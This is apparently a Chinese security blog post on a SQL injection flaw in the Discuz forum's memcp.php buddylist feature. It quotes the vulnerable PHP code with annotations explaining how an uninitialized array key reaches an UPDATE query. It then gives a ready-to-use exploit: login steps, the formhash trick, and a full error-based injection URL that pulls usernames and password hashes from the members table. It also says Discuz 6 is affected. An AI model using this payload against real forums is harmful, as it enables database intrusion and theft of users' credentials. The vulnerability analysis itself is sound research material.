漏洞文件:memcp.php
elseif($action == 'buddylist') { if(!submitcheck('buddysubmit', 1)) { $query = $db->query("SELECT b.*, m.username FROM {$tablepre}buddys b, {$tablepre}members m WHERE b.uid='$discuz_uid' AND m.uid=b.buddyid ORDER BY dateline DESC"); while($buddy = $db->fetch_array($query)) { $buddy['dateline'] = gmdate("$dateformat $timeformat", $buddy['dateline'] + $timeoffset * 3600); $buddylist[] = $buddy; } include template('memcp_misc'); } else { $buddyarray = array(); $query = $db->query("SELECT * FROM {$tablepre}buddys WHERE uid='$discuz_uid'"); while($buddy = $db->fetch_array($query)) { $buddyarray[$buddy['buddyid']] = $buddy; } if(!empty($delete) && is_array($delete)) { $db->query("DELETE FROM {$tablepre}buddys WHERE uid='$discuz_uid' AND buddyid IN ('".implode('/',/'', $delete)."')"); } if(is_array($descriptionnew)) { //问题出在这里 $descriptionnew未被初始化 discuz会初始时注册变量, 当我们提交 http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[123']=1 的时候 注册了$descriptionnew 变量 /* include/common.inc.php foreach(array('_COOKIE', '_POST', '_GET') as $_request) { foreach($$_request as $_key => $_value) { $_key{0} != '_' && $$_key = daddslashes($_value); } } */ foreach($descriptionnew as $buddyid => $desc) { //此时的 $buddyid 就是123' 程序初始化的代码不会过滤这里 但是会受gpc的影响 if(($desc = cutstr(dhtmlspecialchars($desc), 255)) != addslashes($buddyarray[$buddyid]['description'])) { $db->query("UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='$buddyid'"); //$buddyid 被带入到update 语句中了 //相当于 UPDATE {$tablepre}buddys SET description='$desc' WHERE uid='$discuz_uid' AND buddyid='123'' } } } if(($newbuddy && $newbuddy != $discuz_userss) || ($newbuddyid && $newbuddyid != $discuz_uid)) { if(!in_array($adminid, array(1, 2, 3))) { $query = $db->query("SELECT COUNT(*) FROM {$tablepre}buddys WHERE uid='$discuz_uid'"); if(($db->result($query, 0)) > 20) { showmessage('buddy_add_toomany'); } } $query = $db->query("SELECT uid FROM {$tablepre}members WHERE ".(empty($newbuddyid) ? "username='$newbuddy'" : "uid='$newbuddyid'")); if($buddyid = $db->result($query, 0)) { if(isset($buddyarray[$buddyid])) { showmessage('buddy_add_invalid'); } $db->query("INSERT INTO {$tablepre}buddys (uid, buddyid, dateline, description) VALUES ('$discuz_uid', '$buddyid', '$timestamp', '".cutstr(dhtmlspecialchars($newdescription), 255)."')"); } else { showmessage('buddy_add_nonexistence'); } } showmessage('buddy_update_succeed', 'memcp.php?action=buddylist'); }
分析没有什么技术含量所以 还是给出利用方法吧,方便大家以后遇见后可以不用像我一样下代码回来分析而是有个可以直接利用的方法和代码
1.先注册账号然后登陆账号
2.
http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[']=1 post formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4
formhash 看html源代码直接替换下
exp:
http://localhost/discuz/memcp.php?action=buddylist&descriptionnew[' and(select 1 from(select count(*),concat((select(select concat(0x7c,username,0x7c,password,0x7c) from cdb_members limit 0,1) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)%23]=1 post formhash=698a7245&buddysubmit=%E6%8F%90+%C2%A0+%E4%BA%A4
看了一下Discuz6也是存在的..不过移到了这个地方:
http://L/my.php?item=buddylist
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论